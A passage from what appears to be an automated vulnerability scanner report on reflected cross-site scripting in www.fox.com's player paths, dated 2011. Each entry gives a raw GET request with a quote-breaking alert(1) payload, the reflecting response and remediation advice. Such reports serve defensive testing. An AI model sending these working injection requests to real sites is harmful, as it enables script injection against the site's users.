s_analytics.hier1="fox:shows:_uiaeff3"-alert(1)-"ddf1ec587d0:fox_playerfoxurlsigningplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_uiae
...[SNIP]...

1.169. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/foxUrlSigningPlugIn.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d142"-alert(1)-"355fb78501b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with quotes, backslashes and control characters backslash-escaped and with < and > encoded as \u003c and \u003e, so that the data can terminate neither the string nor the enclosing script block. Rejecting path segments that contain quotes or angle brackets is a useful additional layer, not a substitute for output encoding.

Request

GET /_ui/fox_player9d142"-alert(1)-"355fb78501b/swf/foxUrlSigningPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.116
Content-Type: text/html; charset=utf-8
Content-Length: 21868
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:18:25 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player9d142"-alert(1)-"355fb78501bfoxurlsigningplugin"
s_analytics.hier1="fox:shows:_ui:fox_player9d142"-alert(1)-"355fb78501bfoxurlsigningplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player9d
...[SNIP]...

1.170. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/foxUrlSigningPlugIn.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64e97"-alert(1)-"09df118e9c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with quotes, backslashes and control characters backslash-escaped and with < and > encoded as \u003c and \u003e, so that the data can terminate neither the string nor the enclosing script block. Rejecting path segments that contain quotes or angle brackets is a useful additional layer, not a substitute for output encoding.

Request

GET /_ui/fox_player/swf64e97"-alert(1)-"09df118e9c9/foxUrlSigningPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.104
Content-Type: text/html; charset=utf-8
Content-Length: 21756
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:18:30 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf64e97"-alert(1)-"09df118e9c9"
s_analytics.prop15="sub section:foxurlsigningplugin" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_ana
...[SNIP]...

1.171. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/ggtp370.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5f9a"-alert(1)-"4e380a2135f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with quotes, backslashes and control characters backslash-escaped and with < and > encoded as \u003c and \u003e, so that the data can terminate neither the string nor the enclosing script block. Rejecting path segments that contain quotes or angle brackets is a useful additional layer, not a substitute for output encoding.

Request

GET /_uia5f9a"-alert(1)-"4e380a2135f/fox_player/swf/ggtp370.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.115
Content-Type: text/html; charset=utf-8
Content-Length: 21848
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:05 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_uia5f9a"-alert(1)-"4e380a2135f:fox_playerggtp370"
s_analytics.hier1="fox:shows:_uia5f9a"-alert(1)-"4e380a2135f:fox_playerggtp370" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_uia5f9a"-alert(1)-"4e380a213
...[SNIP]...

1.172. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/ggtp370.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1b9b"-alert(1)-"e54b1cd4320 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with quotes, backslashes and control characters backslash-escaped and with < and > encoded as \u003c and \u003e, so that the data can terminate neither the string nor the enclosing script block. Rejecting path segments that contain quotes or angle brackets is a useful additional layer, not a substitute for output encoding.

Request

GET /_ui/fox_playere1b9b"-alert(1)-"e54b1cd4320/swf/ggtp370.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.116
Content-Type: text/html; charset=utf-8
Content-Length: 21820
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_playere1b9b"-alert(1)-"e54b1cd4320ggtp370"
s_analytics.hier1="fox:shows:_ui:fox_playere1b9b"-alert(1)-"e54b1cd4320ggtp370" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_playere1b9b"-alert(1)-"e54b1cd43
...[SNIP]...

1.173. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/ggtp370.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca774"-alert(1)-"25f577dff3d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with quotes, backslashes and control characters backslash-escaped and with < and > encoded as \u003c and \u003e, so that the data can terminate neither the string nor the enclosing script block. Rejecting path segments that contain quotes or angle brackets is a useful additional layer, not a substitute for output encoding.

Request

GET /_ui/fox_player/swfca774"-alert(1)-"25f577dff3d/ggtp370.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.101
Content-Type: text/html; charset=utf-8
Content-Length: 21708
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:14 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswfca774"-alert(1)-"25f577dff3d"
s_analytics.prop15="sub section:ggtp370" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytics.getQu
...[SNIP]...

1.174. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/omnitureMedia.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4487e"-alert(1)-"727a136ab82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with quotes, backslashes and control characters backslash-escaped and with < and > encoded as \u003c and \u003e, so that the data can terminate neither the string nor the enclosing script block. Rejecting path segments that contain quotes or angle brackets is a useful additional layer, not a substitute for output encoding.

Request

GET /_ui4487e"-alert(1)-"727a136ab82/fox_player/swf/omnitureMedia.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.112
Content-Type: text/html; charset=utf-8
Content-Length: 21872
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:11:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui4487e"-alert(1)-"727a136ab82:fox_playeromnituremedia"
s_analytics.hier1="fox:shows:_ui4487e"-alert(1)-"727a136ab82:fox_playeromnituremedia" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui4487e"-alert(1
...[SNIP]...

1.175. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/omnitureMedia.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b5e9"-alert(1)-"8beae5ac93f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with quotes, backslashes and control characters backslash-escaped and with < and > encoded as \u003c and \u003e, so that the data can terminate neither the string nor the enclosing script block. Rejecting path segments that contain quotes or angle brackets is a useful additional layer, not a substitute for output encoding.

Request

GET /_ui/fox_player3b5e9"-alert(1)-"8beae5ac93f/swf/omnitureMedia.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.110
Content-Type: text/html; charset=utf-8
Content-Length: 21844
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:11:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player3b5e9"-alert(1)-"8beae5ac93fomnituremedia"
s_analytics.hier1="fox:shows:_ui:fox_player3b5e9"-alert(1)-"8beae5ac93fomnituremedia" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player3b5e9"-alert(1
...[SNIP]...

1.176. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/omnitureMedia.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad80e"-alert(1)-"458de5bad2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with quotes, backslashes and control characters backslash-escaped and with < and > encoded as \u003c and \u003e, so that the data can terminate neither the string nor the enclosing script block. Rejecting path segments that contain quotes or angle brackets is a useful additional layer, not a substitute for output encoding.

Request

GET /_ui/fox_player/swfad80e"-alert(1)-"458de5bad2/omnitureMedia.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.109
Content-Type: text/html; charset=utf-8
Content-Length: 21731
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:11:41 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswfad80e"-alert(1)-"458de5bad2"
s_analytics.prop15="sub section:omnituremedia" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytics
...[SNIP]...

1.177. http://www.fox.com/_ui/fox_player/videoXml.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/videoXml.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bde97"-alert(1)-"e5dbf06f5fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_uibde97"-alert(1)-"e5dbf06f5fc/fox_player/videoXml.php HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.119
Content-Type: text/html; charset=utf-8
Content-Length: 21861
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_uibde97"-alert(1)-"e5dbf06f5fc:fox_playervideoxml"
s_analytics.hier1="fox:shows:_uibde97"-alert(1)-"e5dbf06f5fc:fox_playervideoxml" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_uibde97"-alert(1)-"e5dbf06
...[SNIP]...

1.178. http://www.fox.com/_ui/fox_player/videoXml.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/videoXml.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36edf"-alert(1)-"96f3cfa2d32 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player36edf"-alert(1)-"96f3cfa2d32/videoXml.php HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
